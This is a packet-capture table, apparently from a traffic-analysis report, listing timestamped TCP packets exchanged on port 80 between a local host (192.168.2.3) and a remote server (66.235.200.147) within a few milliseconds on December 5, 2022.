Dec 5, 2022 01:32:37.922138929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922142982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922169924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922177076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922200918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922207117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922230959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922236919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922262907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922269106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922295094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922301054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922326088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922333956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922367096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922369957 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922399998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922404051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922430038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922435045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922461987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922471046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922493935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922502995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922525883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922535896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922558069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922565937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922590017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922619104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922620058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922633886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922652960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922683001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922696114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922713995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922722101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922744989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922775984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922806025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922813892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922813892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922836065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922859907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922859907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922868967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922893047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922931910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922969103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923002005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923012018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923032045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923044920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923063993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923070908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923098087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923103094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923129082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923160076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923171997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923191071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923193932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923223019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923230886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923255920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923265934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923286915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923294067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923319101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923329115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923351049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923357010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923382044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923392057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923413038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923419952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923444033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923451900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923475981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923485994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923507929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923520088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923538923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923553944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923569918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923583984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923599958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923623085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923631907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923643112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923662901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923676014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923695087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923710108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923727036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923758030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923774004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923788071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923798084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923820019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923842907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923851013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923882008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923896074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923912048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923917055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.923942089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923971891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.923984051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924004078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924006939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924035072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924045086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924067020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924076080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924101114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924132109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924150944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924163103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924175978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924195051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924196959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924226046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924236059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924258947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924272060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924289942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924293995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924320936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924324036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924352884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924382925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924386978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924386978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924413919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924443960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924473047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924504042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924524069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924525023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924534082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924556971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924565077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924573898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924597025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924627066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924623966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924643993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924659014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924676895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924690008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924721003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924725056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924725056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924752951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924758911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924782991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924798012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924813986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924822092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924844980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924854994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924876928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924887896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924909115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924912930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924942017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924947977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.924973965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.924979925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925005913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925013065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925036907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925048113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925067902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925072908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925101042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925112963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925132036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925137997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925163031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925169945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925194979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925204039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925225973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925240040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925259113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925265074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925291061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925321102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925326109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925326109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925352097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925380945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925395966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925411940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925427914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925442934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925466061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925473928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925483942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925506115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925528049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925537109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925546885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925579071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925604105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925620079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925628901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925637960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925656080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925667048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925683975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925698042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925710917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925719976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925740004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925765038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925781012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925791979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925803900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925818920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925843954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925858974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925870895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925879955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925899029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925910950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925926924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925941944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925954103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925961971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.925981045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.925991058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926007986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926018000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926035881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926049948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926062107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926070929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926091909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926109076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926117897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926131964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926146030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926161051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926173925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926196098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926201105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926214933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926228046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926234007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926254988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926270962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926280975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926306009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926307917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926322937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926333904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926343918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926361084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926381111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926388979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926399946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926414967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926431894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926441908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926467896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926477909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926493883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926497936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926517963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926521063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926536083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926548004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926574945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926584005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926584005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926603079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926605940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926630020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926655054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926668882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926681042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926692009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926707983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926733971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926748037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926759958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926769972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926786900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926799059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926815987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926841974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926858902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926867962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926876068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926908016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926915884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926937103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926961899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926976919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.926990986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.926996946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927016973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927033901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927043915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927056074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927071095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927090883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927099943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927108049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927126884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927143097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927153111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927174091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927181005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927190065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927210093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927229881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927236080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927249908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927263975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927289963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927323103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927341938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927341938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927341938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927349091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927371025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927376986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927386045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927402973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927422047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927432060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927444935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927459955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927479029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.927486897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.927515030 CET	80	49705	66.235.200.147	192.168.2.3
